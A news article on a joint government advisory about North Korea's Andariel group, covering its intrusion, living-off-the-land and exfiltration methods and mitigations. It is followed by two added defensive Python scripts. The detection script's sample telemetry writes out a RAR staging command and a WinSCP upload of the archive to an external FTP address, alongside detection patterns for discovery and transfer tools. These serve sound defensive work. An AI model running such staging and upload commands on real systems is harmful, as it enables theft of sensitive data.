North Korean Hackers Target Critical Infrastructure for Military Gain

The UK, US and South Korea have warned of a global espionage campaign by a North Korean sponsored cyber threat actor, designed to further the regime’s military and nuclear ambitions.

The joint government advisory detailed how the group, known as Andariel, has compromised critical national infrastructure (CNI) organizations to access sensitive and classified technical information and intellectual property data.

The threat actor primarily targets organizations in the defense, aerospace, energy, nuclear and engineering sectors to exfiltrate information such as contract specifications, design drawings and project details.

The group acts on behalf of the Pyongyang regime, which uses the insights gathered to enhance its military and nuclear programs.

Andariel has also been observed pursuing ransomware attacks against US healthcare organizations as a means of raising funds to finance further espionage activity.

The authoring agencies assess that Andariel is part of the Democratic People’s Republic of Korea (DPRK) Reconnaissance General Bureau (RGB) 3rd Bureau.

The group and its cyber techniques remain an ongoing threat to various industry sectors worldwide.

Paul Chichester, Director of Operations at the UK's National Cyber Security Centre (NCSC), commented: “The global cyber espionage operation that we have exposed today shows the lengths that DPRK state-sponsored actors are willing to go to pursue their military and nuclear programs.”

He added: “It should remind critical infrastructure operators of the importance of protecting the sensitive information and intellectual property they hold on their systems to prevent theft and misuse.”

How Andariel Targets CNI Organizations

The advisory highlighted that Andariel primarily exploits known software vulnerabilities, such as the Log4j vulnerability, to gain initial access to target networks.

The group likely identifies vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in public-facing web servers.

Andariel has researched a number of major vulnerabilities as part of its reconnaissance process. These include vulnerabilities in Apache ActiveMQ, MOVEit, Barracuda Email Security Gateway, GoAnywhere MFT and Log4j.

Following initial access, the group leverages custom tools and malware for discovery and execution. This includes the development of a wide range of remote access trojans (RATs) to enable remote access, manipulation of systems and lateral movement.

These tools contain functionality designed for data discovery and exfiltration, including executing arbitrary commands, keylogging, taking screenshots, listing files and directories, retrieving browser history, snooping on processes, creating and writing to files, capturing network connections, and uploading content to command-and-control (C2) servers.

Andariel also leverages open source and other publicly available tools, such as 3Proxy, AsyncRAT and WinRAR.

The use of such publicly available malware helps the attackers conceal and obfuscate their identities, making attribution harder.

Living-off-the-Land Techniques

The threat actors are well versed in living-off-the-land techniques, using native tools and processes already present within compromised networks. These tools are used to assist actions such as defense evasion, credential access, discovery and lateral movement.

These include legitimate tools such as the Windows command line, PowerShell and the Windows Management Instrumentation command-line utility (WMIC).

Andariel has a preference for netstat commands, the agencies observed. The commands often contain typos and other mistakes, indicating that they are not copied directly from a playbook and that the actors take a flexible, impromptu approach; the mistakes also suggest the attackers have a poor grasp of the English language.

The actors routinely pack late-stage tooling with VMProtect and Themida, commercial packers with advanced anti-debugging and anti-analysis capabilities that hinder detection.

They change settings on compromised systems to force the system to store credentials, then use the aforementioned tools to steal those credentials.

Infrastructure positioned around the world is used to send commands to compromised systems, with malware communications disguised within HTTP packets to appear as benign network traffic.

Data Exfiltration

For data exfiltration, the threat actors use malware they previously placed in the network to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean.

They then identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The relevant files are collected into RAR archives.

Finally, the data is exfiltrated to web services such as cloud storage or servers not associated with their primary C2, including logging into actor-controlled cloud-based service accounts directly from victim networks.

The actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols.
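As an added example, not from the advisory or this article, the following Python sketch shows how a defender might turn the behaviour described in the two sections above into detection logic over Windows process-creation telemetry: a burst of distinct living-off-the-land tools on one host, RAR archive creation, and a WinSCP/PuTTY-family transfer to a destination outside the organization's own address space, with archive-then-transfer on the same host correlated into a higher-confidence alert. The JSON event lines and their field names, the 30-minute window, the internal address ranges and the `.corp.example` suffix are all constructed assumptions; map them to your own telemetry.

```python
"""Detection sketch (added example, not from the advisory): flag Andariel-style
living-off-the-land discovery, RAR staging and tool-based exfiltration in
Windows process-creation telemetry. Event format and thresholds are assumptions."""
import ipaddress
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events in a Sysmon / 4688-like shape (field names assumed).
SAMPLE_EVENTS = r"""
{"ts": "2024-07-25T09:01:10Z", "host": "eng-ws-17", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c netstat -ano"}
{"ts": "2024-07-25T09:01:42Z", "host": "eng-ws-17", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\wbem\\WMIC.exe", "cmdline": "wmic process list brief"}
{"ts": "2024-07-25T09:02:05Z", "host": "eng-ws-17", "user": "CORP\\jdoe", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "cmdline": "powershell -c Get-ChildItem -Recurse D:\\Projects"}
{"ts": "2024-07-25T09:20:31Z", "host": "eng-ws-17", "user": "CORP\\jdoe", "image": "C:\\Program Files\\WinRAR\\Rar.exe", "cmdline": "rar.exe a -r C:\\Users\\Public\\out.rar D:\\Projects\\drawings D:\\Projects\\specs"}
{"ts": "2024-07-25T09:25:12Z", "host": "eng-ws-17", "user": "CORP\\jdoe", "image": "C:\\Users\\jdoe\\Downloads\\WinSCP.exe", "cmdline": "winscp.exe /command \"open ftp://upload@203.0.113.45\" \"put C:\\Users\\Public\\out.rar\""}
{"ts": "2024-07-25T10:05:00Z", "host": "fin-ws-02", "user": "CORP\\asmith", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": "cmd.exe /c netstat -an"}
{"ts": "2024-07-25T10:30:00Z", "host": "fin-ws-02", "user": "CORP\\asmith", "image": "C:\\Program Files\\WinSCP\\WinSCP.exe", "cmdline": "winscp.exe /command \"open sftp://asmith@10.20.30.40\""}
"""

# Native discovery tools the advisory calls out (cmd.exe itself is too noisy to count).
LOTL_RE = re.compile(r"\b(netstat|wmic|powershell|tasklist|whoami|reg|net)(?:\.exe)?\b", re.IGNORECASE)
ARCHIVERS = {"rar.exe", "winrar.exe"}
TRANSFER_TOOLS = {"winscp.exe", "putty.exe", "pscp.exe", "psftp.exe", "ftp.exe"}
DEST_RE = re.compile(r'(?:ftp|sftp|scp)://(?:[^@\s"]+@)?([^/:\s"]+)')
WINDOW = timedelta(minutes=30)
# Address space the organization owns (assumption); anything else is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
INTERNAL_DOMAIN = ".corp.example"


def parse_events(text):
    """Parse JSON lines into event dicts with a datetime and lower-cased image basename."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        ev["proc"] = ev["image"].rsplit("\\", 1)[-1].lower()
        events.append(ev)
    return sorted(events, key=lambda e: e["ts"])


def lotl_tools_in(ev):
    """Names of LOTL tools referenced by the image or anywhere in the command line."""
    return {m.lower() for m in LOTL_RE.findall(ev["cmdline"]) + LOTL_RE.findall(ev["proc"])}


def is_internal(dest):
    """True for IPs inside INTERNAL_NETS or hostnames under INTERNAL_DOMAIN."""
    try:
        addr = ipaddress.ip_address(dest)
    except ValueError:
        return dest.lower().endswith(INTERNAL_DOMAIN)
    return any(addr in net for net in INTERNAL_NETS)


def lotl_bursts(events):
    """One finding per host where >= 3 distinct LOTL tools run within WINDOW."""
    out, by_host = [], defaultdict(list)
    for ev in events:
        by_host[ev["host"]].append(ev)
    for host, evs in by_host.items():
        for i, start in enumerate(evs):
            tools = set()
            for e in evs[i:]:
                if e["ts"] - start["ts"] > WINDOW:
                    break
                tools |= lotl_tools_in(e)
            if len(tools) >= 3:
                out.append({"rule": "lotl_discovery_burst", "host": host, "ts": start["ts"], "detail": sorted(tools)})
                break
    return out


def archive_staging(events):
    """RAR 'a' (add) commands: the collection step described in the advisory."""
    return [{"rule": "archive_staging", "host": ev["host"], "ts": ev["ts"], "detail": ev["cmdline"]}
            for ev in events if ev["proc"] in ARCHIVERS and re.search(r"\s+a\s+", ev["cmdline"])]


def external_transfers(events):
    """File-transfer utilities opening a session to a destination outside the org."""
    out = []
    for ev in events:
        if ev["proc"] not in TRANSFER_TOOLS:
            continue
        m = DEST_RE.search(ev["cmdline"])
        if m and not is_internal(m.group(1)):
            out.append({"rule": "external_transfer_tool", "host": ev["host"], "ts": ev["ts"], "detail": m.group(1)})
    return out


def detect(events):
    """Run all rules, then correlate archive creation followed by an external transfer."""
    findings = lotl_bursts(events) + archive_staging(events) + external_transfers(events)
    archives = [f for f in findings if f["rule"] == "archive_staging"]
    for t in [f for f in findings if f["rule"] == "external_transfer_tool"]:
        for a in archives:
            if a["host"] == t["host"] and timedelta(0) <= t["ts"] - a["ts"] <= WINDOW:
                findings.append({"rule": "staging_then_exfil", "host": t["host"], "ts": t["ts"],
                                 "detail": f"{a['detail']} -> {t['detail']}"})
    return sorted(findings, key=lambda f: (f["ts"], f["rule"]))


if __name__ == "__main__":
    for f in detect(parse_events(SAMPLE_EVENTS)):
        print(f"{f['ts']:%H:%M:%S} {f['host']:<10} {f['rule']:<24} {f['detail']}")
```

On the constructed data only `eng-ws-17` trips the rules: the netstat/wmic/powershell burst, the `rar.exe a` staging and the FTP session to an external address, which the correlation step joins into `staging_then_exfil`; the `fin-ws-02` SFTP session to an internal host is not flagged. The value of the correlation is that each individual rule is noisy in a real estate (administrators run netstat and WinSCP too), while archive creation followed by an external transfer from the same host inside half an hour is rare enough to page on.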

How to Mitigate Andariel Attacks

The advisory set out a range of areas CNI defenders should focus on to mitigate the tactics employed by Andariel. These include:

  • Identify assets affected by the Log4j vulnerability, and upgrade them to the latest versions
  • Prevent exploitation of web-facing servers by maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs)
  • Deploy endpoint agents or other monitoring mechanisms to prevent and detect further adversary activity
  • Monitor for suspicious command-line activity, implement multi-factor authentication for remote access services, and properly segment networks and use allow-listing tools for critical assets
  • Encrypt all sensitive data including personal information
  • Block access to unused ports
  • Change passwords when they are suspected of being compromised
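The first mitigation above starts with knowing which assets carry a vulnerable Log4j. As an added example, not from the advisory, the Python script below audits a constructed `host,path` inventory (the kind of list a filesystem jar scan produces) and reports every Log4j component that is below the patched version for its release branch, treating Log4j 1.x as end-of-life rather than patchable. The inventory lines are constructed, and the minimum fixed versions used (2.17.1 for the main line, 2.12.4 for the Java 7 branch, 2.3.2 for the Java 6 branch) are the editor's assumption based on Apache's released fixes; confirm them against the current Apache security page before relying on them.

```python
"""Inventory audit (added example, not from the advisory): flag hosts whose
Log4j jars are below the patched versions for their release branch."""
import re

# Matches log4j-core (the module that carries the vulnerable lookup code) and
# Log4j 1.x jars; a log4j-api jar on its own is deliberately not flagged.
JAR_RE = re.compile(r"log4j(?:-core)?-(\d+(?:\.\d+){1,2})\.jar$", re.IGNORECASE)

# Minimum fixed versions per branch: assumption based on Apache's released fixes
# (2.17.1 for Java 8+, 2.12.4 for Java 7, 2.3.2 for Java 6). Verify before use.
FIXED_MAIN, FIXED_J7, FIXED_J6 = (2, 17, 1), (2, 12, 4), (2, 3, 2)

# Constructed inventory lines: host,path (e.g. output of a jar scan).
SAMPLE_INVENTORY = """
eng-app-01,/opt/app/lib/log4j-core-2.14.1.jar
eng-app-01,/opt/app/lib/log4j-api-2.14.1.jar
build-07,/opt/tools/legacy/log4j-core-2.12.4.jar
hr-portal,/srv/hr/WEB-INF/lib/log4j-core-2.3.1.jar
old-batch,/opt/batch/lib/log4j-1.2.17.jar
cad-srv-03,/opt/cad/lib/log4j-core-2.17.1.jar
"""


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); shorter strings are padded so tuples compare cleanly."""
    parts = tuple(int(p) for p in text.split("."))
    return parts + (0,) * (3 - len(parts))


def status(version):
    """'ok', 'upgrade' or 'eol-log4j1' for a Log4j version string."""
    v = parse_version(version)
    if v[0] < 2:
        return "eol-log4j1"          # Log4j 1.x is end-of-life: migrate, do not patch
    if v[:2] == (2, 3):              # Java 6 maintenance branch
        return "ok" if v >= FIXED_J6 else "upgrade"
    if v[:2] == (2, 12):             # Java 7 maintenance branch
        return "ok" if v >= FIXED_J7 else "upgrade"
    return "ok" if v >= FIXED_MAIN else "upgrade"


def audit(inventory):
    """Return one finding per inventory line whose Log4j jar is not 'ok'."""
    findings = []
    for line in inventory.strip().splitlines():
        host, path = (s.strip() for s in line.split(",", 1))
        m = JAR_RE.search(path)
        if not m:
            continue
        s = status(m.group(1))
        if s != "ok":
            findings.append({"host": host, "path": path, "version": m.group(1), "status": s})
    return findings


if __name__ == "__main__":
    for f in audit(SAMPLE_INVENTORY):
        print(f"{f['host']:<12} {f['status']:<11} {f['version']:<8} {f['path']}")
```

Run against the sample inventory it reports `eng-app-01` (2.14.1), `hr-portal` (2.3.1) and `old-batch` (Log4j 1.2.17) and stays silent on the patched 2.12.4 and 2.17.1 jars. Branch awareness matters in practice: a host pinned to Java 7 cannot take 2.17.1, so flagging its 2.12.4 jar would only generate noise and erode trust in the report.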
